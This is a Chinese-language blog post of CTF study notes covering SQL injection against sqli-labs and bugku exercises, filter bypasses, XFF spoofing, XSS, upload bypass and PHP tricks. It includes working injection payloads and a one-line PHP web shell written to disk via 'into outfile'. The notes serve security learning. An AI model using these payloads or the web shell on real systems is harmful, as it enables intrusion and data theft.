<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/23png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/23.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/23.png?v=7.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '7.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="sql-labs试炼：">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="ctf学习笔记">
<meta property="og:url" content="http://www.jizhihaosama.works/2019/10/26/ctf学习/index.html">
<meta property="og:site_name" content="SAMA&#39;s blog">
<meta property="og:description" content="sql-labs试炼：">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.loli.net/2019/10/07/Dn2r9iBmcGjLfS4.png">
<meta property="og:image" content="http://www.jizhihaosama.works/2019/10/26/ctf学习/_v_images/20190904210123976_4347.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2018110515185387.png">
<meta property="og:updated_time" content="2019-11-14T05:52:53.404Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ctf学习笔记">
<meta name="twitter:description" content="sql-labs试炼：">
<meta name="twitter:image" content="https://i.loli.net/2019/10/07/Dn2r9iBmcGjLfS4.png">





  
  
  <link rel="canonical" href="http://www.jizhihaosama.works/2019/10/26/ctf学习/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>ctf学习笔记 | SAMA's blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">SAMA's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.jizhihaosama.works/2019/10/26/ctf学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="jizhihaoSAMA">
      <meta itemprop="description" content="It is just a blog,which is belongs to jizhihaoSAMA. XD">
      <meta itemprop="image" content="https://s2.ax1x.com/2019/04/06/AWDFv8.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SAMA's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ctf学习笔记

              
            
          </h1>
        

        <div class="post-meta">
          
            <i class="fa fa-thumb-tack"></i>
            <font color="999999" size="4">UP!</font>
            <span class="post-meta-divider">|</span>
          
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-10-26 11:53:22" itemprop="dateCreated datePublished" datetime="2019-10-26T11:53:22+08:00">2019-10-26</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-11-14 13:52:53" itemprop="dateModified" datetime="2019-11-14T13:52:53+08:00">2019-11-14</time>
              
            
          </span>

          

          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-symbolscount">
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">本文字数：</span>
                
                <span title="本文字数">5.4k</span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">5 分钟</span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="sql-labs试炼："><a href="#sql-labs试炼：" class="headerlink" title="sql-labs试炼："></a>sql-labs试炼：</h1><a id="more"></a>
<p>基础方法<br>order by 经常用不了，所以要用union select 可以判断列数<br>1、有关union select：<br>判断注入位。然后<br>前提条件：有显示位（即有数据库展示数据的位置）</p>
<p>常用方法：<br>group_concat()：一次性打出<br>语句中夹杂的limit：sql在查询时，经常会出现多行结果，用limit可以限定打出的结果，比如仅仅打出第一行，就使用limit 0,1，想打出查询结果的第二行和第四行，用limit 1,3（从第二行到第四行）</p>
<p>mysql的information_schema库内含数据库的许多信息：<br>综合以上一般注入可以用到：<br>①、1,2,group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema=database()  #表示 + 一次性打出 + 当前数据库的所有的表名，from语句必须放在union select 后面。<br>②、group_concat(column_name) from INFORMATION_SCHEMA.columns where table_schema=database()  #表示 + 一次性打出 + 当前数据库的所有的col（列）<br>③、select concat((select database()))：显示当前数据库名字，<br>④、substr(str,int,int)：截取str字符串，从int位开始，截取int位，这里是从1开始，第一个字母为1</p>
<h2 id="sql报错盲注："><a href="#sql报错盲注：" class="headerlink" title="sql报错盲注："></a>sql报错盲注：</h2><p>三种方式：floor（输出长度64位），updatexml（32位，且payload返回不是xml格式），extractvalue（32位））<br>以下为sqllabs less5（利用floor）：<br>①、爆出当前数据库、用户名：（[1]是为了凑够一行）<br><code>id=1&#39; union select count(*),[1],concat((select database()), floor(rand(0)*2))as a from information_schema.columns group by a --+</code> 报错注入的例句，该句会爆出当前使用数据库的名称和一个1或者0的随机数：concat()连接函数，floor()取整函数，rand()是随机生成一个0-1的数字。同时，我们还可以替换掉database()，替换成version()，则会爆出所选的版本。#使用于ubuntu版本的mysql</p>
<p>②、爆出某个数据库的表：<br><code>id=1&#39; union select count(*),[1], concat(&#39;~&#39;,(select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a --+</code>，更改limit后面的第一个数字数字可以爆出所有的表（此处信息超过一行，所以就不能使用group_concat，替换成concat并使用limit，limit代表输出的起始位置，1代表输出1一个，即从0开始输出1一个）。security是已经获取的数据库</p>
<p>③、爆出某表某列：<br><code>id=1&#39; union select count(*),[1], concat(&#39;~&#39;,(select column_name from information_schema.columns where table_schema=&#39;security(数据库)&#39; and table_name=&#39;emails(表名)&#39; limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a --+</code><br>修改limit后面的数字可以爆出所有的列。</p>
<p>④、爆出数据：<br><code>id=1&#39; union select count(\*),[1], concat(&#39;~&#39;,(select email_id from emails limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a --+</code></p>
<h2 id="sql-已得权限-注入（less-7）："><a href="#sql-已得权限-注入（less-7）：" class="headerlink" title="sql 已得权限 注入（less-7）："></a>sql 已得权限 注入（less-7）：</h2><p>得拥有能够读写的权利，且拥有一个明确的绝对路径，文件必须小于max_allowed_packet。<br>（判断是否有读写权限的sql语句：and (select count(*) from mysql.user)&gt;0 如果结果正常说明有读写权利）<br>利用语句<code>select &lt;?php @eval($_POST[&quot;haha&quot;])?&gt; into outpile &quot;一个明确的服务器路径&quot;</code>，给服务器传入一个php文件，此时服务器里面就会有一个这个文件存在你写的路径里面，此时便可以用菜刀来做了。</p>
<h2 id="sql-时间延迟盲注（建议用python写脚本，就相当于真盲注）："><a href="#sql-时间延迟盲注（建议用python写脚本，就相当于真盲注）：" class="headerlink" title="sql 时间延迟盲注（建议用python写脚本，就相当于真盲注）："></a>sql 时间延迟盲注（建议用python写脚本，就相当于真盲注）：</h2><p>可以先看过滤情况，再判断是使用<code>if(exp1,exp2,exp3)</code>(使用方法：如果exp1成立，则执行exp2，否则执行exp3)还是使用<code>case when exp1 then sleep(x) else 1 end</code>（当exp1成立，则sleep x秒，否则就是以1结束），也就是如果注入成功，则页面会sleep x秒，否则直接出现页面不会sleep</p>
<h2 id="sql-真-盲注（Less-8）（python写脚本）："><a href="#sql-真-盲注（Less-8）（python写脚本）：" class="headerlink" title="sql (真)盲注（Less-8）（python写脚本）："></a>sql (真)盲注（Less-8）（python写脚本）：</h2><p>也是在找到注入点之后进行注入。(这里加入单引号为注入点)</p>
<p>①爆数据库：<br>url修改为: url+<code>&quot;?id=1&#39; and ascii(substr(database(),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&#39;--+</code>，i是代表数据库的第几位数，j是代表ascii码，利用返回的网页源码和正则匹配判断网页是否正常（”显示You are in…..”），通过此方法得到数据库的完整名。此时<strong>已经爆出数据库名为security</strong></p>
<p>②爆表：<br>url修改为: url+<code>&quot;?id=1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=&#39;security&#39; limit &quot;+&quot;str(x)&quot;+&quot;,1),&#39;+str(i)+&#39;,1))=str(j)&quot;</code>，其中x代表是位置为x的表，i代表该位置表的第i位，j代表该位置表的第i位的ascii码，通过此方法可以爆出security下面所有的表</p>
<h2 id="sql-insert-into注入-bugku-insert-into注入-新版本无法注入（会报错显示Truncated-incorrect-DOUBLE-value）"><a href="#sql-insert-into注入-bugku-insert-into注入-新版本无法注入（会报错显示Truncated-incorrect-DOUBLE-value）" class="headerlink" title="sql insert into注入(bugku insert into注入 )新版本无法注入（会报错显示Truncated incorrect DOUBLE value）"></a>sql insert into注入(bugku insert into注入 )新版本无法注入（会报错显示Truncated incorrect DOUBLE value）</h2><p>网站执行的sql语句为：<code>insert into client_ip (ip) values (&#39;$ip&#39;)</code>，伪造xff头，为<code>1&#39; and sleep(5)) #</code>输入构建成完整语句：<code>insert into client_ip (ip) values (&#39;1&#39; and sleep(5))</code>，此时会发现网页会sleep 5秒，即insert注入成功，再修改sleep(5)为其他注入语句即可<br><strong>似乎在insert注入中无法使用–+截断之后的字符，要用#</strong></p>
<h2 id="sql-update注入（Less-17）"><a href="#sql-update注入（Less-17）" class="headerlink" title="sql update注入（Less-17）:"></a>sql update注入（Less-17）:</h2><p>先找到注入点（也就是后面加什么符号），然后利用注入语句<code>updatexml(2,concat(0x7e,(select database())),0)</code>+收尾即可</p>
<h2 id="sql-异或注入（bugku-sql注入2）："><a href="#sql-异或注入（bugku-sql注入2）：" class="headerlink" title="sql 异或注入（bugku-sql注入2）："></a>sql 异或注入（bugku-sql注入2）：</h2><p>1、.DS_Store扫描漏洞<br><strong>2</strong>：（重点），这题过滤了许多字符。但通过bp发现<code>&#39;</code>,<code>-</code>没有被过滤，无法使用一般的<code>--+</code>等其他方法注释掉其他方法。找到闭合点为<code>&#39;</code>，构造登陆语句为：<code>admin &#39;-(xxx)-&#39;</code>进行注入（xxx可以使用任意能连接and的语句）<br>解释：<br><img src="https://i.loli.net/2019/10/07/Dn2r9iBmcGjLfS4.png" alt><br>后面的<code>&#39;</code>为了闭合，<code>-</code>就是减号，<code>&#39;&#39;</code>而符合条件的正常字符串结果为1，where语句就相当于对每一行的col值进行判断，判断where表达式的值是否为1，是就输出该行的col值。<br>所以此题可以通过判断返回的是否是用户名错误（正常情况下用户名就是admin，密码可以随便输入，因为它是先判断用户名是否正确再判断密码是否正确）或者密码错误的情况判断括号里面的表达式是否正确，如果正确就返回密码错误，反之则是账号错误。</p>
<p><strong>过滤技巧：</strong><br>1、由于此题空格和,都被过滤了，可用的方法就少了，substr，mid，left等方法不能使用逗号，就要换方法使用，比如substr(‘abcde’from(1)for(1))=a（数字两边一定要有括号，其他同理，第一个，都要替换成for(这里的)，注意，from的第一个字母为1，），此题ascii没有过滤，索性使用ascii方法注入（注意，如果是一个长字符串，ascii方法测试的仅仅是第一个字符串）。之后就可以使用python脚本注入了。（空格可以用/*<em>/代替，语句之间用+也可以）<br>2、等号过滤之后可以使用<code>!(exp1&lt;&gt;exp2)</code>，这等于exp1=exp2，还有like，in，between…and…（&gt;=前面且&lt;=后面）等方法。<br>3、select过滤之后可以尝试使用/\</em>!%53eLEct*/绕过，修改成sel+ect（效果甚微，一种方式），修改大小写，修改成url编码，修改成s/**/e/**/l/**/e/**/c/**/t，修改成chr(xx)+chr(xx)+chr(xx)的形式，修改成hex格式，或者内嵌入会被过滤掉的字符</p>
<h1 id="ip欺骗"><a href="#ip欺骗" class="headerlink" title="ip欺骗"></a>ip欺骗</h1><p>Remote Address：具有一定的防篡改功能（修改之后获取不到响应报文），是发送请求的源地址，但如果被服务器的反向代理器转发，就收不到用户的真实IP，所以就有了xff，xff用来存储用户的真实地址，然后发送给后端<br>xff（X-Forwarded-For）：是http请求端真正的ip，也就是用户的ip，但可以被修改</p>
<p>做题时可以通过修改xff获取flag。</p>
<h1 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h1><p>执行命令：<br><img src="_v_images/20190904210123976_4347.png" alt></p>
<h1 id="XSS做题记录"><a href="#XSS做题记录" class="headerlink" title="XSS做题记录"></a>XSS做题记录</h1><p>1、设法弹窗：<br>①如果被过滤掉了\&lt;script>标签，可以直接尝试使用其他标签在标签中加入onerror，<br>②如果输入\<xxx>或者&lt;/\xxx&gt;都会被过滤，</xxx></p>
<h1 id="upload-试炼"><a href="#upload-试炼" class="headerlink" title="upload 试炼"></a>upload 试炼</h1><p>1、 通过截断上传数据包，修改Content-Type来上传</p>
<h1 id="？？"><a href="#？？" class="headerlink" title="？？"></a>？？</h1><p>1、对于定时刷新的网页，可以用python的session提交。<br>2、</p>
<h1 id="php伪协议获取当前php页面源码："><a href="#php伪协议获取当前php页面源码：" class="headerlink" title="php伪协议获取当前php页面源码："></a>php伪协议获取当前php页面源码：</h1><p><code>?page=php://filter/read=convert.base64-encode/resource=xxx.php</code></p>
<h1 id="弱类型比较"><a href="#弱类型比较" class="headerlink" title="弱类型比较"></a>弱类型比较</h1><p>  <img src="https://img-blog.csdnimg.cn/2018110515185387.png" alt="在这里插入图片描述">  </p>
<h1 id="一般题记录"><a href="#一般题记录" class="headerlink" title="一般题记录"></a>一般题记录</h1><p>漏洞绕过：<br>1、要求$_GET[‘num’]==1，但is_numeric函数判断输入的是否是纯数字，输入任意1+str都可以过。<br>2、php的ereg(i)函数，可以使用%00截断，这个%00会被转义成\0，被算作一个结束符，也就是一个字符</p>
<p><font size="4"><strong>3、文件绕过：上传php文件，有关php的文件类型有php2,php3,php4,php5,phtml,phtm,phps。</strong></font><br>4、intval漏洞：intval(“十六进制”)会返回0，但intval(“十六进制+1”)会强制转换成数形。(旧版本漏洞)<br>5、php的chr()本质是对256取余，遇到类似判定可使用。<br>6、代替空格的方法：<br>     %09 TAB键（水平）<br>    ​ %0a 新建一行<br>    ​ %0b TAB键（垂直）<br>    ​ %0c 新的一页<br>    ​ %0d return功能<br>    ​ %a0 空格<br>7、django使用的gbk编码，超过%F7的编码在gbk中无意义，当站点设置的CURLOPT_SAFE_UPLOAD为True时，如果在请求前面加@，phpcurl组件会把后面的字符当成绝对路径请求来读取文件，当且仅当文件中存在中文字符的时候。django才会报错获取文件内容。<br>8、php5.5.0前，传入修饰符’\e’会使preg_replace方法的replacement（第二个参数）部分会被执行成php代码(前提能发生替换行为)，PHP正则开头前会要加/<br>9、当system(“”)无法使用时，可以使用print_r(scandir(‘.’))获取路径，var_dmup(file_get_contents(‘路径’))</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/18/彻底禁用Chrome请停用开发者模式/" rel="next" title="彻底禁用Chrome请停用开发者模式">
                <i class="fa fa-chevron-left"></i> 彻底禁用Chrome请停用开发者模式
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/14/Java导入数据库包/" rel="prev" title="Java（Eclipse）导入MySQL驱动">
                Java（Eclipse）导入MySQL驱动 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://s2.ax1x.com/2019/04/06/AWDFv8.jpg" alt="jizhihaoSAMA">
            
              <p class="site-author-name" itemprop="name">jizhihaoSAMA</p>
              <div class="site-description motion-element" itemprop="description">It is just a blog,which is belongs to jizhihaoSAMA. XD</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">15</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#sql-labs试炼："><span class="nav-number">1.</span> <span class="nav-text">sql-labs试炼：</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql报错盲注："><span class="nav-number">1.1.</span> <span class="nav-text">sql报错盲注：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-已得权限-注入（less-7）："><span class="nav-number">1.2.</span> <span class="nav-text">sql 已得权限 注入（less-7）：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-时间延迟盲注（建议用python写脚本，就相当于真盲注）："><span class="nav-number">1.3.</span> <span class="nav-text">sql 时间延迟盲注（建议用python写脚本，就相当于真盲注）：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-真-盲注（Less-8）（python写脚本）："><span class="nav-number">1.4.</span> <span class="nav-text">sql (真)盲注（Less-8）（python写脚本）：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-insert-into注入-bugku-insert-into注入-新版本无法注入（会报错显示Truncated-incorrect-DOUBLE-value）"><span class="nav-number">1.5.</span> <span class="nav-text">sql insert into注入(bugku insert into注入 )新版本无法注入（会报错显示Truncated incorrect DOUBLE value）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-update注入（Less-17）"><span class="nav-number">1.6.</span> <span class="nav-text">sql update注入（Less-17）:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-异或注入（bugku-sql注入2）："><span class="nav-number">1.7.</span> <span class="nav-text">sql 异或注入（bugku-sql注入2）：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ip欺骗"><span class="nav-number">2.</span> <span class="nav-text">ip欺骗</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#命令注入"><span class="nav-number">3.</span> <span class="nav-text">命令注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS做题记录"><span class="nav-number">4.</span> <span class="nav-text">XSS做题记录</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#upload-试炼"><span class="nav-number">5.</span> <span class="nav-text">upload 试炼</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#？？"><span class="nav-number">6.</span> <span class="nav-text">？？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#php伪协议获取当前php页面源码："><span class="nav-number">7.</span> <span class="nav-text">php伪协议获取当前php页面源码：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#弱类型比较"><span class="nav-number">8.</span> <span class="nav-text">弱类型比较</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#一般题记录"><span class="nav-number">9.</span> <span class="nav-text">一般题记录</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">jizhihaoSAMA</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
    <span title="站点总字数">20k</span>
  

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    
    <span title="站点阅读时长">18 分钟</span>
  
</div>


<!-- <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v7.1.0</div><-->




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.0"></script>

  <script src="/js/motion.js?v=7.1.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.0"></script>




  
  <script src="/js/scrollspy.js?v=7.1.0"></script>
<script src="/js/post-details.js?v=7.1.0"></script>



  


  <script src="/js/next-boot.js?v=7.1.0"></script>


  

  

  

  


  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

